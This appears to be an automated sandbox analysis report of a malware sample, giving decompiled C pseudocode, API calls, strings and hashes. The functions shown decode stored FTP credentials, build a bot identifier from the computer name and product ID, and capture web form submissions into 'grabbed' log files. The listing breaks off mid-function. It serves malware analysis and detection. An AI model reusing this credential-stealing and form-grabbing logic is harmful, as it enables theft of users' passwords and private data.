								__eflags =  *_t105;
								if( *_t105 == 0) {
									goto L28;
								}
								_t99 =  *_t124;
								__eflags = _t99;
								if(_t99 == 0) {
									goto L28;
								}
								__eflags = _t99 - 0x30;
								if(_t99 == 0x30) {
									L21:
									__eflags = _t124[0];
									if(_t124[0] == 0) {
										goto L28;
									}
									L22:
									_t100 = 0;
									__eflags =  *_t124;
									if( *_t124 == 0) {
										goto L28;
									} else {
										goto L23;
									}
									do {
										L23:
										_t100[_t124] = _t100[_t124] ^ 0x00000019;
										_t100 =  &(_t100[1]);
										__eflags = _t100[_t124];
									} while (_t100[_t124] != 0);
									__eflags = _t100;
									if(_t100 > 0) {
										_push(_t83);
										_push(_t112);
										_t113 = _v568;
										_push(_t124);
										_push(_t105);
										_t84 = E0040A4B7(_t83, 0x311, _v568, L"ftp://%S:%S@%S:%u\n");
										_t128 = _t128 + 0x14;
										__eflags = _t84;
										if(_t84 > 0) {
											_t125 = _a4;
											_t85 = E00409B2A(_t84, _t125, _t113);
											__eflags = _t85;
											if(_t85 != 0) {
												_t46 = _t125 + 4;
												 *_t46 =  &(( *(_t125 + 4))[1]);
												__eflags =  *_t46;
											}
										}
									}
									goto L28;
								}
								__eflags = _t99 - 0x31;
								if(_t99 != 0x31) {
									goto L22;
								}
								goto L21;
							}
							_t114 =  &(_t111[6]);
							_v556 =  &(_t111[6]);
							E0040663C(_t114);
							_t83 = E00409DCE(_v556, _t114, 0);
							__eflags = _t83 - 1;
							if(_t83 < 1) {
								goto L15;
							}
							__eflags = _t83 - 0xffff;
							if(_t83 <= 0xffff) {
								goto L16;
							}
							goto L15;
							L28:
							_v548 = _v548 + 1;
							__eflags = _v548 - _v544;
						} while (_v548 < _v544);
					}
					goto L29;
				} else {
					_v552 = L"ftplist.txt";
					E0040B4D8( &_v524,  &_v552, _t131, 1, 5, E00406664, _a4, 0, 0, 0);
					goto L31;
				}
			}

0x0040666a
0x00406685
0x0040688d
0x00406895
0x00406895
0x0040668b
0x0040668e
0x004066bf
0x004066c2
0x004066c7
0x004066cc
0x004066ce
0x00000000
0x00000000
0x004066e5
0x004066ea
0x004066ee
0x004066f1
0x00406884
0x00406888
0x00000000
0x00406888
0x00406704
0x0040670a
0x0040670e
0x00406710
0x0040686e
0x00406872
0x0040687f
0x00000000
0x0040687f
0x00406716
0x0040671a
0x0040671e
0x0040672a
0x00406732
0x00406735
0x00406737
0x0040673a
0x00000000
0x00000000
0x00406749
0x0040675b
0x0040676b
0x0040677b
0x0040677d
0x00406782
0x00406784
0x00000000
0x00000000
0x0040678a
0x0040678f
0x00000000
0x00000000
0x00406795
0x00406797
0x00000000
0x00000000
0x0040679d
0x004067a6
0x004067ab
0x004067ae
0x004067b7
0x004067be
0x004067c3
0x004067c5
0x004067ec
0x004067ee
0x004067ef
0x004067ef
0x004067f3
0x004067f6
0x00000000
0x00000000
0x004067f8
0x004067fc
0x004067ff
0x00000000
0x00000000
0x00406801
0x00406803
0x00406805
0x00000000
0x00000000
0x00406807
0x0040680a
0x00406811
0x00406811
0x00406815
0x00000000
0x00000000
0x00406817
0x00406817
0x00406819
0x0040681b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040681d
0x0040681d
0x0040681d
0x00406821
0x00406822
0x00406822
0x00406828
0x0040682a
0x0040682c
0x0040682d
0x0040682e
0x00406832
0x00406833
0x0040683e
0x00406843
0x00406846
0x00406848
0x0040684a
0x00406850
0x00406855
0x00406857
0x00406859
0x00406859
0x00406859
0x00406859
0x00406857
0x00406848
0x00000000
0x0040682a
0x0040680c
0x0040680f
0x00000000
0x00000000
0x00000000
0x0040680f
0x004067c7
0x004067cc
0x004067d0
0x004067db
0x004067e0
0x004067e3
0x00000000
0x00000000
0x004067e5
0x004067ea
0x00000000
0x00000000
0x00000000
0x0040685c
0x0040685c
0x00406864
0x00406864
0x0040672a
0x00000000
0x00406690
0x004066a9
0x004066b1
0x00000000
0x004066b1

APIs

Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C

HeapAlloc.KERNEL32(00000008,00000626,?,00000001,00000000,?,?), ref: 00406704
StrStrIA.SHLWAPI(?,;server=), ref: 00406747
StrStrIA.SHLWAPI(?,;port=), ref: 00406759
StrStrIA.SHLWAPI(?,;user=), ref: 00406769
StrStrIA.SHLWAPI(?,;password=), ref: 0040677B

Part of subcall function 0040B4D8: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040B517
Part of subcall function 0040B4D8: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B53E
Part of subcall function 0040B4D8: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040B589
Part of subcall function 0040B4D8: Sleep.KERNEL32(00000000,?,?), ref: 0040B5E6
Part of subcall function 0040B4D8: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040B614
Part of subcall function 0040B4D8: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040B626

Strings

;user=, xrefs: 00406761
;server=, xrefs: 00406740
;port=, xrefs: 00406751
;password=, xrefs: 00406773
ftp://%S:%S@%S:%u, xrefs: 00406834
ftplist.txt, xrefs: 004066A9

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
String ID: ;password=$;port=$;server=$;user=$ftp://%S:%S@%S:%u$ftplist.txt
API String ID: 1635188419-881966611
Opcode ID: 6d400158bb4797d1d0a8e2cbd4ac329376993ba592b68de0d8cb9fa42615cf6a
Instruction ID: b887b5950c32a1fe934b624cb454a9501e0daf98c00b7f792d61da5ca74124b7
Opcode Fuzzy Hash: 6d400158bb4797d1d0a8e2cbd4ac329376993ba592b68de0d8cb9fa42615cf6a
Instruction Fuzzy Hash: 8251BE325043019BD721AF14C841A6BB7E5AF84708F15483EF886B72E2D739DD55CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E5B1, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040E5B1(void* __ebx, void* __ecx, intOrPtr _a4) {
				char _v8;
				long _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				short _v90;
				short _v104;
				struct _OSVERSIONINFOW _v388;
				void* __edi;
				struct _OSVERSIONINFOW* _t32;
				char _t34;
				void* _t36;
				void* _t40;
				short _t42;
				void* _t49;
				void* _t52;
				void* _t53;
				intOrPtr _t56;
				signed int _t61;

				_t52 = __ecx;
				_t49 = __ebx;
				_v12 = 0x28;
				if(GetComputerNameW( &_v104,  &_v12) == 0) {
					E00409833( &_v104,  &M0040269C, 0xe);
					_v90 = 0;
				}
				E004098AA( &_v388,  &_v388, 0, 0x11c);
				_v388.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v388) != 0) {
					_push(0x100);
					_t32 =  &(_v388.szCSDVersion);
				} else {
					_push(0x11c);
					_t32 =  &_v388;
				}
				_push(0);
				_push(_t32);
				E004098AA(_t32);
				_push(_t49);
				_t34 = E0040EDD3(_t52, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"InstallDate");
				_v16 = _v16 & 0x00000000;
				_v24 = _t34;
				_t36 = E0040EEE6(_t52, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"DigitalProductId", 0,  &_v8);
				if(_t36 == 0xffffffff || _t36 <= 0) {
					_t61 = _v16;
				} else {
					_t61 = E0040B855(_v8, _t36);
					E004097F7(_v8);
				}
				_v20 = _t61;
				_push(E0040B855( &_v24, 8));
				_t40 = E0040B855( &_v388, 0x11c);
				_t56 = _a4;
				_push(_t40);
				_push( &_v104);
				_push(L"%s_%08X%08X");
				_t53 = 0x3c;
				_t42 = E0040A4B7( &_v104, _t53, _t56);
				_v12 = _t42;
				if(_t42 < 1) {
					E00409833(_t56, L"fatal_error", 0x16);
					_t42 = 0;
					 *((short*)(_t56 + 0x16)) = 0;
				}
				return _t42;
			}

0x0040e5b1
0x0040e5b1
0x0040e5c2
0x0040e5d1
0x0040e5de
0x0040e5e5
0x0040e5e5
0x0040e5fb
0x0040e607
0x0040e615
0x0040e620
0x0040e625
0x0040e617
0x0040e617
0x0040e618
0x0040e618
0x0040e62b
0x0040e62c
0x0040e62d
0x0040e632
0x0040e644
0x0040e649
0x0040e64d
0x0040e65d
0x0040e666
0x0040e681
0x0040e66c
0x0040e678
0x0040e67a
0x0040e67a
0x0040e68a
0x0040e692
0x0040e69b
0x0040e6a0
0x0040e6a3
0x0040e6a7
0x0040e6a8
0x0040e6af
0x0040e6b0
0x0040e6bb
0x0040e6be
0x0040e6c8
0x0040e6cd
0x0040e6cf
0x0040e6cf
0x0040e6d6

APIs

GetComputerNameW.KERNEL32 ref: 0040E5C9
GetVersionExW.KERNEL32(?,?,00000000,0000011C), ref: 0040E60D

Strings

InstallDate, xrefs: 0040E633
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0040E638, 0040E63D, 0040E65B
%s_%08X%08X, xrefs: 0040E6A8
fatal_error, xrefs: 0040E6C2
(, xrefs: 0040E5C2
unknown, xrefs: 0040E5D5
DigitalProductId, xrefs: 0040E656

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: ComputerNameVersion
String ID: %s_%08X%08X$($DigitalProductId$InstallDate$SOFTWARE\Microsoft\Windows NT\CurrentVersion$fatal_error$unknown
API String ID: 3835364902-2859850376
Opcode ID: 646ff0f3d839ba5c64a3d73bf179bd1ed0d40931f21abba312f0c69465a900a6
Instruction ID: 1f9dce5f25a67d5ddf84c7a19d36106d898544b9e1eb8a585fc8bd09aca5fd90
Opcode Fuzzy Hash: 646ff0f3d839ba5c64a3d73bf179bd1ed0d40931f21abba312f0c69465a900a6
Instruction Fuzzy Hash: 43318272900218BADB11EAA28D45FEF77BCAF59704F10887BF504F21C1D7799B0587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00404375, Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 340
timenetworkCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00404375(void* __eax, void* __ecx, char* _a4, intOrPtr* _a8, void* _a12) {
				char _v540;
				char _v800;
				char _v804;
				char _v892;
				char _v896;
				char _v908;
				struct _SYSTEMTIME _v928;
				struct _SYSTEMTIME _v956;
				intOrPtr _v984;
				intOrPtr _v996;
				intOrPtr _v1000;
				intOrPtr _v1004;
				char* _v1008;
				char _v1011;
				char _v1012;
				signed int _v1016;
				signed short* _v1020;
				void* _v1024;
				long _v1028;
				signed short* _v1032;
				signed short* _v1036;
				signed short _v1040;
				intOrPtr* _v1044;
				long _v1048;
				signed int _v1052;
				signed int _v1056;
				long _v1060;
				char _v1064;
				intOrPtr _v1068;
				char _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t148;
				signed int _t167;
				long _t185;
				signed short _t187;
				signed int _t192;
				signed int _t194;
				signed char _t198;
				signed int _t200;
				void* _t203;
				void* _t204;
				long _t205;
				long _t206;
				signed short* _t215;
				signed short _t216;
				void* _t218;
				signed int _t226;
				intOrPtr* _t230;
				intOrPtr _t233;
				long _t256;
				signed int _t263;
				intOrPtr* _t267;
				signed short* _t269;
				signed short* _t271;
				long _t274;
				intOrPtr* _t276;
				signed int _t277;
				void* _t279;

				_t279 = (_t277 & 0xfffffff8) - 0x424;
				_t256 = 0;
				_v1028 = 0;
				if(__eax <= 0) {
					L51:
					asm("sbb eax, eax");
					return  ~0x00000000;
				} else {
					_t267 = __ecx + 0x10;
					_v1044 = _t267;
					_v1024 = __eax;
					do {
						_t233 =  *_t267;
						if(_t233 == _t256) {
							_t230 = _a8;
							L6:
							_t234 =  *(_t267 + 4);
							_t147 =  *((intOrPtr*)(_t267 + 8)) + _t234;
							_v1048 = _t256;
							_v1060 = _t256;
							_v1016 = _t147;
							if(_t234 >= _t147) {
								L36:
								_t256 = 0;
								if(( *(_t267 - 0x10) & 0x00000008) == 0) {
									L46:
									if(( *(_t267 - 0x10) & 0x00000010) != 0 &&  *((intOrPtr*)(_t267 - 4)) != _t256) {
										E00407C4A( &_v1012, _t234, 1,  &_v892);
										if(E0040B74D( &(_v928.wSecond),  *((intOrPtr*)(_t267 - 4)), E0040A398( *((intOrPtr*)(_t267 - 4)))) != 0) {
											E00409FF5( &_v1012,  &_v908);
											GetLocalTime( &_v928);
											E0040EE81( &_v1012,  &_v896,  &_v1016, 3,  &_v928, 0x10);
										}
									}
									goto L50;
								}
								if(_v1048 != 0) {
									L39:
									if(( *(_t267 - 0x10) & 0x00000200) == 0) {
										_t167 = E00409A3C(_t147 | 0xffffffff, _t256, _a4);
										_t258 = _t167;
										__eflags = _t167;
										if(__eflags != 0) {
											_push(_v1048);
											E00412544(_t234, _t252, __eflags, 0xc9, _t258, 0, L"Grabbed data from: %s\n\n%S", _t258);
											_t279 = _t279 + 0x18;
											E004097F7(_t258);
										}
									} else {
										_t252 = 0x3c;
										E004098AA( &_v1012,  &_v1012, _t256, _t252);
										_v1008 =  &_v800;
										_v1024 = _t252;
										_v1004 = 0x103;
										if(InternetCrackUrlA(_a4, _t256, _t256,  &_v1024) == 1 && _v1008 > _t256) {
											GetSystemTime( &_v956);
											_push(_v956.wDay & 0x0000ffff);
											_push(_v956.wMonth & 0x0000ffff);
											_push((_v956.wYear & 0x0000ffff) - 0x7d0);
											_push( &_v804);
											_t252 = 0x104;
											E0040A4B7( &_v804, 0x104,  &_v540, L"grabbed\\%S_%02u_%02u_%02u.txt");
											_t279 = _t279 + 0x14;
											E0041235A(_t234, 0x104, 2, 0,  &_v540, _v1064, _v1076);
											_t267 = _v1080;
										}
									}
									E004097F7(_v1048);
									_t256 = 0;
									goto L46;
								}
								_t185 = 0x23;
								_v1060 = _t185;
								_t147 = E00409B94(_t185, "*NO MATCHES FOUND FOR CURRENT MASK*");
								_v1052 = _t147;
								if(_t147 == 0) {
									goto L46;
								}
								goto L39;
							} else {
								goto L9;
								L13:
								_t252 =  *_t187 & 0x0000ffff;
								if(_t252 != 4) {
									_t234 = (_t252 & 0x0000ffff) - 4;
									_t194 = E00403865(_t187 + 4, 0,  &_v1052, (_t252 & 0x0000ffff) - 4,  *_t230 + _v1056,  *_a12 - _v1056);
									__eflags = _t194;
									if(_t194 == 0) {
										goto L34;
									} else {
										__eflags =  *_v1032 - 4;
										_t271 = _v1036;
										if( *_v1032 != 4) {
											_t45 =  &_v1052;
											 *_t45 = _v1052 + _v1056;
											__eflags =  *_t45;
										} else {
											_v1056 = _v1052;
										}
										goto L22;
									}
								} else {
									if( *_t234 != _t252) {
										_t226 = _v1056;
									} else {
										_t226 =  *_a12;
									}
									_v1052 = _t226;
									L22:
									_t234 = _v1052 - _v1056;
									_t198 =  *(_v1044 - 0x10);
									_t263 = ( *_t271 & 0x0000ffff) - 4;
									_v1040 = _t234;
									if((_t198 & 0x00000004) == 0) {
										__eflags = _t198 & 0x00000008;
										if((_t198 & 0x00000008) != 0) {
											_t200 = E00409787(_t234 + _t263 + _v1060 + 2,  &_v1048);
											__eflags = _t200;
											if(_t200 != 0) {
												_t274 = _v1048;
												__eflags = _t263;
												if(_t263 > 0) {
													E00409833(_v1060 + _t274,  &(_v1036[2]), _t263);
													_t75 =  &_v1072;
													 *_t75 = _v1072 + _t263;
													__eflags =  *_t75;
												}
												_t252 = _v1040;
												_t203 = E00409833(_v1060 + _t274,  *_t230 + _v1056, _t252);
												_t234 = _v1056;
												__eflags =  *(_t234 - 0x10) & 0x00000100;
												if(( *(_t234 - 0x10) & 0x00000100) == 0) {
													_t204 = E0040FAE9(_t203, _t252);
													_t86 =  &_v1064;
													 *_t86 = _v1064 + _t204;
													__eflags =  *_t86;
													_t230 = _a8;
												} else {
													_v1060 = _v1060 + _t252;
												}
												_t205 = _v1060;
												 *((char*)(_t205 + _t274)) = 0xa;
												_t206 = _t205 + 1;
												__eflags = _t206;
												_v1060 = _t206;
												 *((char*)(_t206 + _t274)) = 0;
											}
										}
									} else {
										_t215 =  *_a12 - _t234 + _t263;
										_v1032 = _t215;
										if(_t215 != 0) {
											_t216 = E004097CC(_t215);
											_v1040 = _t216;
											if(_t216 != 0) {
												_t252 = _v1056;
												_t218 = E00409833(E00409833(_t216,  *_t230, _v1056) + _v1056,  &(_t271[2]), _t263);
												_t276 = _a12;
												_t234 =  *_t230 + _v1076;
												E00409833(_t218 + _t263 + _v1056,  *_t230 + _v1076,  *_t276 - _v1076);
												E004097F7( *_t230);
												_v1068 = _v1068 + 1;
												 *_t230 = _v1080;
												 *_t276 = _v1072;
											}
										}
									}
									L34:
									_t147 = _v1016;
									if(_v1020 < _v1016) {
										_t234 = _v1020;
										L9:
										_t187 = _t234 + ( *_t234 & 0x0000ffff);
										_t269 = ( *_t187 & 0x0000ffff) + _t187;
										_v1020 = _t269 + ( *_t269 & 0x0000ffff);
										_t252 =  *_t234 & 0x0000ffff;
										_v1032 = _t234;
										_v1040 = _t187;
										_v1036 = _t269;
										if(( *_t234 & 0x0000ffff) != 4) {
											goto L11;
										} else {
											_v1056 = _v1056 & 0x00000000;
											goto L13;
										}
									}
									_t267 = _v1044;
									goto L36;
								}
								L11:
								_t192 = E00403865( &(_t234[2]),  &_v1056, 0, (_t252 & 0x0000ffff) - 4,  *_t230,  *_a12);
								__eflags = _t192;
								if(_t192 == 0) {
									goto L34;
								} else {
									_t271 = _v1036;
									_t234 = _v1032;
									_t187 = _v1040;
									goto L13;
								}
							}
						}
						_v1011 = 0x2a;
						_v1012 = 0x3f;
						_v1008 = _t233;
						_t148 = E0040A398(_t233);
						_t230 = _a8;
						_v1004 = _t148;
						_v1000 =  *_t230;
						_v996 =  *_a12;
						_v984 = 0x12;
						if(E0040A790( &_v1012) != 0) {
							goto L6;
						}
						L50:
						_t267 = _t267 + 0x1c;
						_t139 =  &_v1024;
						 *_t139 = _v1024 - 1;
						_v1044 = _t267;
					} while ( *_t139 != 0);
					goto L51;
				}
			}

0x0040437b
0x00404384
0x00404386
0x0040438c
0x004047bc
0x004047c3
0x004047cc
0x00404392
0x00404394
0x00404397
0x0040439b
0x0040439f
0x0040439f
0x004043a3
0x004043e9
0x004043ec
0x004043ec
0x004043f2
0x004043f4
0x004043f8
0x004043fc
0x00404402
0x0040460a
0x0040460a
0x00404610
0x00404735
0x00404739
0x0040474e
0x0040476c
0x0040477a
0x00404787
0x004047a6
0x004047a6
0x0040476c
0x00000000
0x00404739
0x0040461a
0x00404639
0x00404640
0x004046ff
0x00404704
0x00404706
0x00404708
0x0040470a
0x0040471c
0x00404721
0x00404725
0x00404725
0x00404646
0x00404648
0x00404650
0x0040465c
0x0040466a
0x0040466e
0x0040467f
0x00404697
0x004046a5
0x004046ae
0x004046bc
0x004046c4
0x004046ca
0x004046d6
0x004046db
0x004046ed
0x004046f2
0x004046f2
0x0040467f
0x0040472e
0x00404733
0x00000000
0x00404733
0x0040461e
0x00404624
0x00404628
0x0040462d
0x00404633
0x00000000
0x00000000
0x00000000
0x00404408
0x00404408
0x0040446d
0x0040446d
0x00404474
0x004044a5
0x004044ad
0x004044b2
0x004044b4
0x00000000
0x004044ba
0x004044be
0x004044c2
0x004044c6
0x004044d6
0x004044d6
0x004044d6
0x004044c8
0x004044cc
0x004044cc
0x00000000
0x004044c6
0x00404476
0x00404479
0x00404482
0x0040447b
0x0040447e
0x0040447e
0x00404486
0x004044da
0x004044e5
0x004044e9
0x004044ec
0x004044ef
0x004044f5
0x0040456d
0x0040456f
0x00404583
0x00404588
0x0040458a
0x0040458c
0x00404590
0x00404592
0x004045a4
0x004045a9
0x004045a9
0x004045a9
0x004045a9
0x004045af
0x004045c0
0x004045c5
0x004045c9
0x004045d0
0x004045db
0x004045e0
0x004045e0
0x004045e0
0x004045e4
0x004045d2
0x004045d2
0x004045d2
0x004045e7
0x004045eb
0x004045ef
0x004045ef
0x004045f0
0x004045f4
0x004045f4
0x0040458a
0x004044f7
0x004044fe
0x00404500
0x00404504
0x0040450a
0x0040450f
0x00404515
0x0040451b
0x00404531
0x00404536
0x00404544
0x0040454c
0x00404553
0x0040455c
0x00404560
0x00404566
0x00404566
0x00404515
0x00404504
0x004045f8
0x004045f8
0x00404600
0x0040440a
0x0040440e
0x00404411
0x00404416
0x0040441d
0x00404421
0x00404424
0x00404428
0x0040442c
0x00404434
0x00000000
0x00404436
0x00404436
0x00000000
0x00404436
0x00404434
0x00404606
0x00000000
0x00404606
0x0040443d
0x00404454
0x00404459
0x0040445b
0x00000000
0x00404461
0x00404461
0x00404465
0x00404469
0x00000000
0x00404469
0x0040445b
0x00404402
0x004043a5
0x004043aa
0x004043af
0x004043b3
0x004043b8
0x004043bb
0x004043c1
0x004043ce
0x004043d2
0x004043e1
0x00000000
0x004043e7
0x004047ab
0x004047ab
0x004047ae
0x004047ae
0x004047b2
0x004047b2
0x00000000
0x0040439f

APIs

InternetCrackUrlA.WININET ref: 00404676
GetSystemTime.KERNEL32(?), ref: 00404697
GetLocalTime.KERNEL32(?,?,?,?,00000000,00000001,?), ref: 00404787

Strings

Grabbed data from: %s%S, xrefs: 0040470F
*NO MATCHES FOUND FOR CURRENT MASK*, xrefs: 0040461F
?, xrefs: 004043AA
grabbed\%S_%02u_%02u_%02u.txt, xrefs: 004046C5
*, xrefs: 004043A5

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Time$CrackInternetLocalSystem
String ID: *$*NO MATCHES FOUND FOR CURRENT MASK*$?$Grabbed data from: %s%S$grabbed\%S_%02u_%02u_%02u.txt
API String ID: 1914253387-996826763
Opcode ID: dab875ede379e02140827da2f08b9e519b6961b500cd446d874ec69ed2012110
Instruction ID: 76a2d93be6f831bb7f196cf1b4d77e584dbd94ec812c467030a4f4f4d7db9bdc
Opcode Fuzzy Hash: dab875ede379e02140827da2f08b9e519b6961b500cd446d874ec69ed2012110
Instruction Fuzzy Hash: 22D17CB15083419FD720DF29C880A6BB7E4FFC9708F00492EFA95A7291D778D905CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00404065, Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 276
networkCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00404065(char* __edx, void* __esi) {
				char _v5;
				signed int _v12;
				char _v13;
				void* _v20;
				char* _v24;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				void* _v84;
				char _v348;
				void* __ebx;
				void* __edi;
				intOrPtr _t94;
				signed char _t95;
				void* _t101;
				void* _t104;
				char* _t112;
				void* _t117;
				intOrPtr _t119;
				void* _t120;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr* _t126;
				intOrPtr _t130;
				void* _t133;
				void* _t134;
				void* _t135;
				int _t140;
				void* _t143;
				intOrPtr _t145;
				void* _t151;
				char* _t153;
				char _t155;
				char* _t157;
				intOrPtr _t162;
				intOrPtr* _t163;
				void* _t164;
				void* _t165;

				_t164 = __esi;
				_t158 = __edx;
				_t94 =  *((intOrPtr*)(__esi + 0x30));
				_v12 = _v12 & 0x00000000;
				_v5 = 0xff;
				_t167 = _t94;
				if(_t94 == 0) {
					L24:
					if((_v12 & 0x00000001) == 0) {
						_t124 =  *((intOrPtr*)(_t164 + 0x34));
						_t184 = _t124;
						if(_t124 != 0 && E00403A8F(_t152, _t158, _t184, 3, _t124,  *(_t164 + 4),  *(_t164 + 8)) != 0) {
							_v12 = _v12 | 0x00000001;
						}
					}
					_t145 =  *((intOrPtr*)(_t164 + 0x1c));
					if(_t145 < 0x21) {
						L37:
						_v13 = 0;
						goto L38;
					} else {
						_t162 =  *((intOrPtr*)(_t164 + 0x18));
						if(E00409868("application/x-www-form-urlencoded", _t162, 0x21) != 0) {
							goto L37;
						}
						_t123 =  *((intOrPtr*)(_t162 + 0x21));
						if(_t123 == 0x3b || _t123 == 0) {
							_v13 = 1;
							L38:
							if(_v5 != 0xff) {
								__eflags = _v5 - 1;
								if(_v5 != 1) {
									L44:
									if((_v12 & 0x00000008) == 0) {
										L74:
										_t95 = _v12;
										if((_t95 & 0x00000001) != 0) {
											return _t95;
										}
										if(E00403AF3(_t158, _t164) != 0) {
											_v12 = _v12 | 0x00000002;
										}
										if(_v13 != 0 && E00403E70(_t158, _t164) != 0) {
											_v12 = _v12 | 0x00000004;
										}
										return _v12;
									}
									_t99 =  *((intOrPtr*)(_t164 + 0x24));
									_v5 = 0;
									if( *((intOrPtr*)(_t164 + 0x24)) != 0) {
										__eflags = _v13;
										if(_v13 == 0) {
											__eflags = _t145;
											if(_t145 != 0) {
												_t101 = E0040A545( &_v20, "*FAILED TO PARSE \"%s\"*",  *((intOrPtr*)(_t164 + 0x18)));
												_t165 = _t165 + 0xc;
												__eflags = _t101 - 1;
												if(_t101 < 1) {
													_v20 = 0;
												}
												L61:
												if(_v20 == 0) {
													L73:
													_v12 = _v12 & 0xfffffff7;
													goto L74;
												}
												E00412A5F( &_v24);
												_t104 = E00409A3C( *(_t164 + 8), 0,  *(_t164 + 4));
												_t161 = _t104;
												if(_t104 != 0) {
													_t158 = 0x3c;
													E004098AA( &_v84,  &_v84, 0, _t158);
													_v84 = _t158;
													if(InternetCrackUrlA( *(_t164 + 4),  *(_t164 + 8), 0,  &_v84) == 1) {
														_t158 = _v24;
														_t153 = 0x401458;
														if(_t158 == 0) {
															_t158 = 0x401458;
														}
														_t112 =  *(_t164 + 0xc);
														if(_t112 == 0) {
															_t112 = "-";
														}
														if((_v12 & 0x00000001) != 0) {
															_t153 = L" *BLOCKED*";
														}
														_push(_v20);
														_push(_t158);
														_push(_t112);
														_push(_t153);
														_v5 = E00412544(_t153, _t158, (0 | _v72 == 0x00000004) + 0xb, (0 | _v72 == 0x00000004) + 0xb, _t161, 0, L"%s%s\nReferer: %S\nUser input: %s\nData:\n\n%S", _t161);
													}
													E004097F7(_t161);
												}
												E004097F7(_v24);
												E004097F7(_v20);
												if(_v5 != 0) {
													goto L74;
												} else {
													goto L73;
												}
											}
											_push("*UNKNOWN*");
											_push(9);
											L58:
											_pop(_t117);
											_v20 = E00409B94(_t117);
											goto L61;
										}
										_t119 = E00409B94(_t99,  *((intOrPtr*)(_t164 + 0x20)));
										_v20 = _t119;
										__eflags = _t119;
										if(_t119 == 0) {
											goto L73;
										}
										_t120 = 0;
										__eflags =  *((intOrPtr*)(_t164 + 0x24));
										if( *((intOrPtr*)(_t164 + 0x24)) <= 0) {
											goto L61;
										} else {
											goto L50;
										}
										do {
											L50:
											_t158 = _t120 + _v20;
											_t155 =  *_t158;
											__eflags = _t155 - 0x26;
											if(_t155 != 0x26) {
												__eflags = _t155 - 0x2b;
												if(_t155 == 0x2b) {
													 *_t158 = 0x20;
												}
											} else {
												 *_t158 = 0xa;
											}
											_t120 = _t120 + 1;
											__eflags = _t120 -  *((intOrPtr*)(_t164 + 0x24));
										} while (_t120 <  *((intOrPtr*)(_t164 + 0x24)));
										goto L61;
									}
									_push("*EMPTY*");
									_push(7);
									goto L58;
								}
								L43:
								_v12 = _v12 | 0x00000008;
								goto L44;
							}
							if( *((char*)(_t164 + 0x14)) != 1 ||  *((intOrPtr*)(_t164 + 0x24)) <= 0) {
								goto L44;
							} else {
								goto L43;
							}
						} else {
							goto L37;
						}
					}
				}
				_t126 = E00410520( &_v24, __edx, _t167, _t94, 0x4e25, 0x10000000);
				_t152 = _v24;
				_t163 = _t126;
				_v20 = _t163;
				if(E0040A690(_t126, _v24) == 0) {
					L23:
					E004097F7(_v20);
					goto L24;
				} else {
					goto L2;
				}
				do {
					L2:
					_t8 = _t163 + 1; // 0x1
					_t157 = _t8;
					if( *_t157 == 0) {
						goto L22;
					}
					_t130 =  *_t163;
					if(_t130 == 0x21) {
						L12:
						_t163 = _t157;
						L13:
						_t152 = _t163;
						if(E004037F5(_t163,  *(_t164 + 4),  *(_t164 + 8)) == 0) {
							goto L22;
						}
						_t133 = _t151;
						if(_t133 == 0) {
							L20:
							_v5 = 1;
							L21:
							if(_t151 != 2) {
								goto L23;
							}
							goto L22;
						}
						_t134 = _t133 - 1;
						if(_t134 == 0) {
							_v5 = 0;
							goto L21;
						}
						_t135 = _t134 - 1;
						if(_t135 == 0) {
							_t158 = 0x3c;
							E004098AA( &_v84,  &_v84, 0, _t158);
							_v68 =  &_v348;
							_v84 = _t158;
							_v64 = 0x103;
							_t140 = InternetCrackUrlA( *(_t164 + 4),  *(_t164 + 8), 0,  &_v84);
